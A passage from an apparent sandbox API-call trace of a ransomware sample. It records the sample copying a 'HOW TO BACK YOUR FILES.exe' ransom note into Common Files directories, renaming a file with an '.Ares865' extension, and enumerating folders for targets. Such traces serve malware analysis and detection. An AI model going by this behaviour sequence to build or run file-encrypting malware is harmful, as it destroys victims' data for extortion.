RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0148.053] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Services") returned="C:\\Program Files (x86)\\Common Files\\Services" [0148.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0148.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7948 | out: hHeap=0x2b0000) returned 1 [0148.054] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Services") returned 44 [0148.054] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Services" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Services") returned="C:\\Program Files (x86)\\Common Files\\Services" [0148.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\services\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.055] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.056] GetLastError () returned 0x0 [0148.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.056] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.057] CloseHandle (hObject=0x120) returned 1 [0148.057] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.057] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.057] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.057] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.058] lstrcpyW (in: lpString1=0x2cce45a, lpString2="verisign.bmp" | out: lpString1="verisign.bmp") returned="verisign.bmp" [0148.058] lstrlenW (lpString="verisign.bmp") returned 12 [0148.058] lstrlenW (lpString="Ares865") returned 7 [0148.058] lstrcmpiW (lpString1="ign.bmp", lpString2="Ares865") returned 1 [0148.058] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.Ares865") returned 65 [0148.058] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.Ares865" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp.ares865"), dwFlags=0x1) returned 1 [0148.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.Ares865" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.061] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2702) returned 1 [0148.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0148.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared" [0148.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0148.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0148.064] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned 52 [0148.064] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared" [0148.064] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.064] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.065] GetLastError () returned 0x0 [0148.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.065] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.065] CloseHandle (hObject=0x120) returned 1 [0148.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.065] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.066] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.066] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.066] lstrcpyW (in: lpString1=0x2cce46a, lpString2="DAO" | out: lpString1="DAO") returned="DAO" [0148.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0148.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1708 [0148.066] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0148.066] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537b9380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0148.066] lstrcmpiW (lpString1="Help", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.066] lstrcmpiW (lpString1="Help", lpString2="aoldtz.exe") returned 1 [0148.066] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Help" | out: lpString1="Help") returned="Help" [0148.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0148.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1788 [0148.066] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0148.066] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5350bac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.066] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.066] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0148.067] lstrcmpiW (lpString1="ink", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.067] lstrcmpiW (lpString1="ink", lpString2="aoldtz.exe") returned 1 [0148.067] lstrcpyW (in: lpString1=0x2cce46a, lpString2="ink" | out: lpString1="ink") returned="ink" [0148.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0148.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1808 [0148.067] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0148.067] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSEnv", cAlternateFileName="")) returned 1 [0148.067] lstrcmpiW (lpString1="MSEnv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.067] lstrcmpiW (lpString1="MSEnv", lpString2="aoldtz.exe") returned 1 [0148.067] lstrcpyW (in: lpString1=0x2cce46a, lpString2="MSEnv" | out: lpString1="MSEnv") returned="MSEnv" [0148.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0148.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1688 [0148.067] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0148.067] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53720e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0148.067] lstrcmpiW (lpString1="MSInfo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.067] lstrcmpiW (lpString1="MSInfo", lpString2="aoldtz.exe") returned 1 [0148.067] lstrcpyW (in: lpString1=0x2cce46a, lpString2="MSInfo" | out: lpString1="MSInfo") returned="MSInfo" [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1888 [0148.068] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0148.068] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0148.068] lstrcmpiW (lpString1="OFFICE14", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.068] lstrcmpiW (lpString1="OFFICE14", lpString2="aoldtz.exe") returned 1 [0148.068] lstrcpyW (in: lpString1=0x2cce46a, lpString2="OFFICE14" | out: lpString1="OFFICE14") returned="OFFICE14" [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f00d8 [0148.068] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0148.068] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Portal", cAlternateFileName="")) returned 1 [0148.068] lstrcmpiW (lpString1="Portal", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.068] lstrcmpiW (lpString1="Portal", lpString2="aoldtz.exe") returned 1 [0148.068] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Portal" | out: lpString1="Portal") returned="Portal" [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0148.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1908 [0148.068] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0148.068] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0148.068] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.068] lstrcmpiW (lpString1="Stationery", lpString2="aoldtz.exe") returned 1 [0148.069] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0148.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0148.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0518 [0148.069] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0148.069] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0148.069] lstrcmpiW (lpString1="TextConv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.069] lstrcmpiW (lpString1="TextConv", lpString2="aoldtz.exe") returned 1 [0148.069] lstrcpyW (in: lpString1=0x2cce46a, lpString2="TextConv" | out: lpString1="TextConv") returned="TextConv" [0148.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0148.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0380 [0148.069] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0148.069] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0148.069] lstrcmpiW (lpString1="Triedit", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.069] lstrcmpiW (lpString1="Triedit", lpString2="aoldtz.exe") returned 1 [0148.070] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Triedit" | out: lpString1="Triedit") returned="Triedit" [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f0270 [0148.070] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0148.070] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0148.070] lstrcmpiW (lpString1="VBA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.070] lstrcmpiW (lpString1="VBA", lpString2="aoldtz.exe") returned 1 [0148.070] lstrcpyW (in: lpString1=0x2cce46a, lpString2="VBA" | out: lpString1="VBA") returned="VBA" [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1988 [0148.070] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0148.070] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0148.070] lstrcmpiW (lpString1="VC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.070] lstrcmpiW (lpString1="VC", lpString2="aoldtz.exe") returned 1 [0148.070] lstrcpyW (in: lpString1=0x2cce46a, lpString2="VC" | out: lpString1="VC") returned="VC" [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0148.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4710 [0148.070] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0148.070] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0148.071] lstrcmpiW (lpString1="VGX", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.071] lstrcmpiW (lpString1="VGX", lpString2="aoldtz.exe") returned 1 [0148.071] lstrcpyW (in: lpString1=0x2cce46a, lpString2="VGX" | out: lpString1="VGX") returned="VGX" [0148.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0148.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1a08 [0148.071] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0148.071] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0148.071] lstrcmpiW (lpString1="VSTA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.071] lstrcmpiW (lpString1="VSTA", lpString2="aoldtz.exe") returned 1 [0148.071] lstrcpyW (in: lpString1=0x2cce46a, lpString2="VSTA" | out: lpString1="VSTA") returned="VSTA" [0148.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0148.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1a88 [0148.071] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0148.071] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53557d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0148.071] lstrcmpiW (lpString1="VSTO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.071] lstrcmpiW (lpString1="VSTO", lpString2="aoldtz.exe") returned 1 [0148.071] lstrcpyW (in: lpString1=0x2cce46a, lpString2="VSTO" | out: lpString1="VSTO") returned="VSTO" [0148.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0148.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1b08 [0148.072] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0148.072] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0148.072] lstrcmpiW (lpString1="Web Server Extensions", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.072] lstrcmpiW (lpString1="Web Server Extensions", lpString2="aoldtz.exe") returned 1 [0148.072] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Web Server Extensions" | out: 